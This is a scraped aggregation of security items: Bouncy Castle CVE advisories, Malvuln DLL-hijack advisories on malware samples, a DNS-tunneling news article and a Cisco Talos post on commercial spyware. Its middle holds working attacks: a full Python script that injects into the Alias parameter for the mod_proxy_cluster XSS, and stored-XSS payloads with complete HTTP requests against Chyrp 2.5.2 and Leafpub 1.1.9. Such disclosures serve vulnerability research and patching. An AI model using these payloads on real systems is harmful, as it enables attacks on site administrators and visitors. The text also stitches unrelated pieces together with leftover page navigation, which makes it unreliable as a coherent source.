An issue was discovered in Bouncy Castle Java Cryptography APIs before 1.78. An Ed25519 verification code infinite loop can occur via a crafted signature and public key.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-30172

**Bouncy Castle crafted signature and public key can be used to trigger an infinite loop**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-m44j-cfrm-g8qc: Bouncy Castle crafted signature and public key can be used to trigger an infinite loop

An issue was discovered in Bouncy Castle Java TLS API and JSSE Provider before 1.78. Timing-based leakage may occur in RSA based handshakes because of exception processing.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-30171

**Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack")**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-fips (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-v435-xc8x-wvr9: Bouncy Castle affected by timing side-channel for RSA key exchange ("The Marvin Attack")

An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java LTS before 2.73.6, BC-FJA before 1.0.2.5, and BC C# .Net before 2.3.1. Importing an EC certificate with crafted F2m parameters can lead to excessive CPU consumption during the evaluation of the curve parameters.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29857

**Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.**

Moderate severity GitHub Reviewed Published May 14, 2024 to the GitHub Advisory Database • Updated May 14, 2024

**Package**

nuget BouncyCastle (NuGet)

**Affected versions**

< 2.3.1

nuget BouncyCastle.Cryptography (NuGet)

maven org.bouncycastle:bc-fips (Maven)

maven org.bouncycastle:bcpkix-jdk14 (Maven)

maven org.bouncycastle:bcpkix-jdk15to18 (Maven)

maven org.bouncycastle:bcpkix-jdk18on (Maven)

maven org.bouncycastle:bcprov-jdk14 (Maven)

maven org.bouncycastle:bcprov-jdk15on (Maven)

maven org.bouncycastle:bcprov-jdk15to18 (Maven)

maven org.bouncycastle:bcprov-jdk18on (Maven)

maven org.bouncycastle:bctls-jdk14 (Maven)

maven org.bouncycastle:bctls-jdk15to18 (Maven)

maven org.bouncycastle:bctls-jdk18on (Maven)

**Description**

Published to the GitHub Advisory Database

May 14, 2024

Last updated

May 14, 2024

GHSA-8xfc-gm6g-vgpv: Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.

TrojanSpy.Win64.EMOTET.A malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy.Win64.EMOTET.A Vulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x64-bit "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: EMOTETType: PE64MD5: f917c77f60c3c1ac6dbbadbf366ddd30SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486cVuln ID: MVID-2024-0684Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x64 DLL CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy.Win64.EMOTET.A MVID-2024-0684 Code Execution

Backdoor.Win32.AsyncRat malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AsyncRatVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: AsyncRatType: PE32MD5: 2337b9a12ecf50b94fc95e6ac34b3eccSHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9Vuln ID: MVID-2024-0683Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

Apache mod_proxy_cluster suffers from a cross site scripting vulnerability.

    import requestsimport argparsefrom bs4 import BeautifulSoupfrom urllib.parse import urlparse, parse_qs, urlencode, urlunparsefrom requests.exceptions import RequestExceptionclass Colors:    RED = '\033[91m'    GREEN = '\033[1;49;92m'    RESET = '\033[0m'def get_cluster_manager_url(base_url, path):    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)    try:        response = requests.get(base_url + path)        response.raise_for_status()    except requests.exceptions.RequestException as e:        print(Colors.RED + f"Error: {e}" + Colors.RESET)        return None    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)    if response.status_code == 200:        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)        # Use BeautifulSoup to parse the HTML content        soup = BeautifulSoup(response.text, 'html.parser')        # Find all 'a' tags with 'href' attribute        all_links = soup.find_all('a', href=True)        # Search for the link containing the Alias parameter in the href attribute        cluster_manager_url = None        for link in all_links:            parsed_url = urlparse(link['href'])            query_params = parse_qs(parsed_url.query)            alias_value = query_params.get('Alias', [None])[0]            if alias_value:                print(Colors.GREEN + f"Alias value found" + Colors.RESET)                cluster_manager_url = link['href']                break        if cluster_manager_url:            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)            return cluster_manager_url        else:            print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)            return None    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")    return Nonedef update_alias_value(url):    parsed_url = urlparse(url)    query_params = parse_qs(parsed_url.query, keep_blank_values=True)    query_params['Alias'] = ["<DedSec-47>"]    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)    return updated_urldef check_response_for_value(url, check_value):    response = requests.get(url)    if check_value in response.text:        print(Colors.RED + "Website is vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)    else:        print(Colors.GREEN + "Website is not vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)def main():    # Create a command-line argument parser    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")    # Add a command-line argument for the target (-t/--target)    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)    # Add a command-line argument for the URL path (-u/--url)    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)    # Parse the command-line arguments    args = parser.parse_args()    # Get the cluster manager URL from the specified website    cluster_manager_url = get_cluster_manager_url(args.target, args.url)    # Check if the cluster manager URL is found    if cluster_manager_url:        # Modify the URL by adding the cluster manager value        modified_url = args.target + cluster_manager_url        modified_url = update_alias_value(args.target + cluster_manager_url)        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)        # Check the response for the value "<DedSec-47>"        check_response_for_value(modified_url, "<DedSec-47>")if __name__ == "__main__":    main()

Apache mod_proxy_cluster Cross Site Scripting

Chryp version 2.5.2 suffers from a persistent cross site scripting vulnerability.

    # Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/chyrp/# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip# Version: 2.5.2# Tested on: MacOS### Steps to Reproduce ###- Login from the address: http://localhost/chyrp/?action=login.- Click on 'Write'.- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>- Fill in the 'Body' area and click 'Publish'.- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /chyrp/admin/?action=add_post HTTP/1.1Host: localhostCookie: ChyrpSession=c4194c16a28dec03e449171087981d11;show_more_options=trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------28307567523233313132815561598Content-Length: 1194Origin: http://localhostReferer: http://localhost/chyrp/admin/?action=write_postUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="title""><img src=x onerror=alert("Stored")>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="body"<p>1337</p>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="status"public-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="slug"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="created_at"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="original_time"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="trackbacks"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="feather"text-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="hash"11e11aba15114f918ec1c2e6b8f8ddcf-----------------------------28307567523233313132815561598--

Chyrp 2.5.2 Cross Site Scripting

Leafpub version 1.1.9 suffers from a persistent cross site scripting vulnerability.

    # Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/Leafpub# Software Link: https://github.com/Leafpub/leafpub# Version: 1.1.9# Tested on: MacOS### Steps to Reproduce ###- Please login from this address: http://localhost/leafpub/admin/login- Click on the Settings > Advanced- Enter the following payload into the "Custom Code" area and save it: ("><imgsrc=x onerror=alert("Stored")>)- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /leafpub/api/settings HTTP/1.1Host: localhostCookie:authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwloUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 476Origin: http://localhostReferer: http://localhost/leafpub/admin/settingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetitle=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

Leafpub 1.1.9 Cross Site Scripting

By Deeba Ahmed
Hackers are hiding malicious messages in everyday internet traffic! Learn how DNS tunneling works and how to protect yourself from this sneaky cyberattack. Stop hackers from scanning your network and tracking your clicks.
This is a post from HackRead.com Read the original post: DNS Tunneling Used for Stealthy Scans and Email Tracking

DNS tunneling is used to bypass security filters by hiding malicious traffic in DNS packets, allowing hackers to steal stolen data or hide inbound malware or command-and-control instructions.

However, Palo Alto Networks’ Unit 42 has discovered that threat actors are using DNS tunneling in innovative ways other than C2 and VPN, including scanning for network vulnerabilities and assessing the success of phishing campaigns.

****DNS Tunneling for Tracking****

Reportedly, attackers are abusing DNS tunneling to track victims’ activities related to spam, phishing, or advertisement contents, and delivering malicious domains with victims’ identity information encoded in subdomains. 

For instance, in phishing attacks, DNS tunneling helps attackers embed tracking information within DNS requests, allowing them to monitor user interactions with content hosted on Content Delivery Networks (CDNs) and see if their emails are being delivered.

This was observed in the TrkCdn campaign, which targeted 731 potential victims using 75 IP addresses for nameservers, and in the SpamTracker campaign which targeted Japanese educational institutions using 44 tunneling domains with IP addresses 35.75.233210. Both campaigns used the same DGA naming and subdomain encoding method.

Overview of data exfiltration and infiltration with DNS tunneling (Screenshot: Unit42)

Attackers utilized DNS logs to track victims’ emails and monitor campaign performance. They registered new domains between October 2020 and January 2024, 2 to 12 weeks before distribution and monitored their behaviour for nine to 11 months and retired them after a year.

****DNS Tunneling for Scanning****

Adversaries can use DNS tunnelling to scan network infrastructure by encoding IP addresses and timestamps in tunneling payloads with spoofed source IP addresses, to discover open resolvers, exploit resolver vulnerabilities, and perform DNS attacks, potentially leading to malicious redirection or denial of service (**DoS**). 

This method was observed in a campaign called “SecShow,” where attackers periodically scan a victim’s network infrastructure and perform reflection attacks.

“This campaign generally targets open resolvers. As a result, we find victims mainly come from education, high tech, and government fields, where open resolvers are commonly found,” Unit 42 researchers **wrote**.

Furthermore, attackers can use the same technique to track multiple victims and are exploiting DNS queries to detect network misconfigurations in targeted organizations, potentially exploiting them for DoS attacks, data theft, or malware installation.

To protect yourself, invest in security software that detects unusual DNS traffic patterns, and regularly update your operating system and applications to patch vulnerabilities. Always be wary of clicking on suspicious links in emails or messages.

1.  Dangers of DNS poisoning and how to prevent it
2.  DNSpionage group’s Karkoff malware selectively pick victims
3.  Roaming Mantis Malware Returns with DNS Changer Capability
4.  Check your VPN DNS test tool legitimacy: Is it “legit” or deceptive
5.  Cybersecurity Firm Hacks Itself, Finds DNS Flaw Leak AWS Credentials

DNS Tunneling Used for Stealthy Scans and Email Tracking

Commercial spyware tools can threaten democratic values by enabling governments to conduct covert surveillance on citizens, undermining privacy rights and freedom of expression.

Tuesday, May 14, 2024 08:42

Cisco Talos is delighted to share updates about our ongoing partnership with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to combat cybersecurity threats facing civil society organizations.

Talos has partnered with CISA on several initiatives through the Joint Cyber Defense Collaborative (JCDC), including sharing intelligence on strategic threats of interest.

Adversaries are leveraging advancements in technology and the interconnectedness of the world’s networks to undermine democratic values and interests by targeting high-risk communities within civil society. According to CISA, these communities include activists, journalists, academics and organizations engaged in advocacy and humanitarian causes. Consequently, the U.S. government has elevated efforts in recent years to counter cyber threats that have placed the democratic freedoms of organizations and individuals at heightened risk.

The JCDC’s High-Risk Community Protection (HRCP) initiative is one such measure that brings together government, technology companies, and civil society organizations to strengthen the security of entities at heightened risk of cyber threat targeting and transnational repression.

The HRCP initiative’s outputs — including a threat mitigation guide for civil society, operational best practices, and online resources for communities at risk — aim to counter the threats posed by state-sponsored advanced persistent threats (APTs) and, increasingly, private-sector offensive actors (PSOA).

Our ongoing partnership with CISA and contributions to the JCDC’s HRCP initiative are consistent with Cisco’s security mission to protect data, systems, and networks, and uphold and respect the human rights of all.

**Spyware threats persist despite government and private sector measures**

As we’ve written about, the use of commercially available spyware to target high-profile or at-risk individuals and organizations is a global problem. This software can often track targets’ exact location, steal their messages and personal information, or even listen in on phone calls. Private companies, commonly referred to as “PSOAs” or “cyber mercenaries,” have monetized the development of these offensive tools, selling their spyware to any government willing to pay regardless of the buyer's intended use.

Commercial spyware tools can threaten democratic values by enabling governments to conduct covert surveillance on citizens, undermining privacy rights and freedom of expression. Lacking any international laws or norms around the use of commercial spyware, this surveillance can lead to the suppression of dissent, erosion of trust in democratic institutions, and consolidation of power in the hands of authoritarian governments.

The U.S. and its partners have taken steps to curb the proliferation of these dangerous tools. These include executive orders banning the use of certain spyware by U.S. government agencies, export restrictions and sanctions on companies or individuals involved in the development and sale of spyware (such as the recent sanctioning of members of the Intellexa Commercial Spyware Consortium), and diplomatic efforts with international partners and allies to pressure countries that harbor or support such firms.

Private industry has also played a substantial role in countering this threat, including by publishing research and publicly attributing PSOAs and countries involved in digital repression. Some companies have also developed countersurveillance technologies (such as Apple’s Lockdown Mode) to protect high-risk users and have initiated legal challenges through lawsuits against PSOAs alleging privacy violations. In March 2023, Cisco proudly became principal co-author of the Cybersecurity Tech Accord principles limiting offensive operations in cyberspace, joining several technology partners in calling for industry-wide principles to counter PSOAs.

**Talos intelligence fuels HRCP threat mitigation guide for civil society**

Talos has tracked the evolution of the commercial spyware industry and APT targeting of high-risk industries, placing us in a strong position to contribute our knowledge to the HRCP effort. Our research on two key threat actors — the Intellexa Commercial Spyware Consortium and the China state-sponsored Mustang Panda group — informed the HRCP guide’s overview of tactics commonly used against high-risk communities.

Talos has closely monitored threats stemming from the Intellexa Consortium, an umbrella group of organizations and individuals that offer commercial spyware tools to global customers, including authoritarian governments. In May 2023, we conducted a technical analysis of Intellaxa’s flagship PREDATOR spyware which was initially developed by a PSOA known as Cytrox. Our research specifically looked at two components of Intellexa's mobile spyware suite known as “ALIEN” and “PREDATOR,” which compose the backbone of the organization’s implant.

Our findings included an in-depth walkthrough of the infection chain, including the implant’s various information-stealing capabilities and evasion techniques. Over time, we learned more about Intellexa’s inner workings, including their spyware development timelines, product offerings, operating paradigms and procedures.

Our research on Mustang Panda also contributed to the mitigation guide by illustrating how government-sponsored threat actors have targeted civil society organizations with their own signature tools and techniques. This APT is heavily focused on political espionage and has targeted non-governmental organizations (NGOs), religious institutions, think tanks, and activist groups worldwide. Mustang Panda commonly sends spear phishing emails using enticing lures to gain access to victim networks and install custom implants, such as PlugX, that enable device control and user monitoring. The group has continuously evolved its delivery mechanisms and payloads to ensure long-term uninterrupted access, underscoring the threat posed to civil society and others.

**What is next for this growing threat?**

Threat actors with ties to Russia, China, and Iran have primarily been responsible for this heightened threat activity, according to industry reporting. But the threat is not limited to them. Last year, a U.K. National Cyber Security Centre (NCSC) estimate found that at least 80 countries have purchased commercial spyware, highlighting how the proliferation of these tools enables even more actors to join the playing field.

Yet we are staying ahead of the game. Talos researchers are continuously identifying the latest trends in threat actor targeting which include not only the use of commercial spyware but other tools and techniques identified in the HRCP guide, such as spear phishing and trojanized applications. Our intelligence powers Cisco’s security portfolio, ensuring customer safety.

Talos created a reporting resource where individuals or organizations suspected of being infected with commercial spyware can contact Talos’ research team (no-spyware@external.cisco.com) to assist in furthering the community’s knowledge of these threats.

We are determined to continue our work with CISA, other agencies, and industry leaders, leveraging the power of partnerships to protect Cisco customers and strengthen community resilience against common adversaries.

Tag

#git